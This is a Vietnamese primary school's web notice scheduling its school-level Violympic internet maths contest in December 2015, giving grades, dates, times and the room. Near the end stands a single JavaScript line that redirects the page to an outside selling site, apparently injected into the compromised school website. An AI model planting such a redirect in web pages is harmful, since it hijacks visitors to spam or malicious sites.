Thông báo Thi giải Toán trên Internet cấp trường

18/12/2015 4:26 Chiều Phản hồi đã bị khóa

Thực hiện văn bản hướng dẫn số: 337 /PGD-VP của PGD&ĐT Quận Cầu Giấy về việc tổ chức thi giải Toán trên internet cho học sinh TH và THCS năm học 2015-2016 và Kế hoạch tổ chức thi Violympic của trường Tiểu học Quan Hoa năm học 2015- 2016, trên cơ sở các lớp tự lựa chọn học sinh tham gia luyện tập, ngày 18/12/2015, trường Tiểu học Quan Hoa chốt danh sách học sinh thi cấp trường. Vậy, nhà trường xin thông báo kế hoạch thi giải toán trên mạng Internet cấp trường như sau:

1. Đối tượng tham gia:

- Học sinh Khối 1;2;3;4;5

- Mỗi lớp lựa chọn 5 học sinh lập danh sách thi cấp trường.

- Học sinh đăng ký tự nguyện theo 2 hình thức thi: Thi giải toán qua Internet bằng Tiếng Việt và Tiếng Anh.

2. Thời gian:

* Thi Toán bằng Tiếng Việt

-  Ngày thi: Thứ hai ngày 21/12/2015.

- Thứ tự thi: K2 – K1 – K5 – K4 – K3

- Thời gian thi theo thứ tự: 14h – 14h30 – 15h – 15h45 – 16h30; kết thúc 17h.

* Thi Toán bằng Tiếng Anh

-  Ngày thi: Thứ sáu ngày 25/12/2015.

- Thứ tự thi: K2 – K1 – K5 – K4 – K3

- Thời gian thi theo thứ tự: 14h – 14h30 – 15h – 15h45 – 16h30; kết thúc 17h.

* Yêu cầu: Học sinh có mặt trước thời gian thi 30 phút, tập trung tại phòng học Tin học(tầng 4).

3. Địa điểm:

- Phòng Tin học (Tầng 4) trường Tiểu học Quan Hoa.

4. Nội dung thi:

- Thi Toán bằng Tiếng Việt: vòng 10

- Thi Toán bằngTiếng Anh:  vòng 7

(Theo lịch mở của Bộ Giáo dục và Đào tạo)

Vậy, nhà trường thông báo tới các đồng chí giáo viên chủ nhiệm, các bậc phụ huynh và các em học sinh để phối hợp thực hiện.

*Lưu ý: Nội dung thông báo này được niêm yết tại Bảng tin và đăng trên trang Web của trường.

Nếu có vướng mắc, phụ huynh có thể liên hệ với GVCN.

BAN GIÁM HIỆU

location.replace(“http://gethere.info/buy.php”);

Các phản hồi đã bị đóng lại bở quản trị.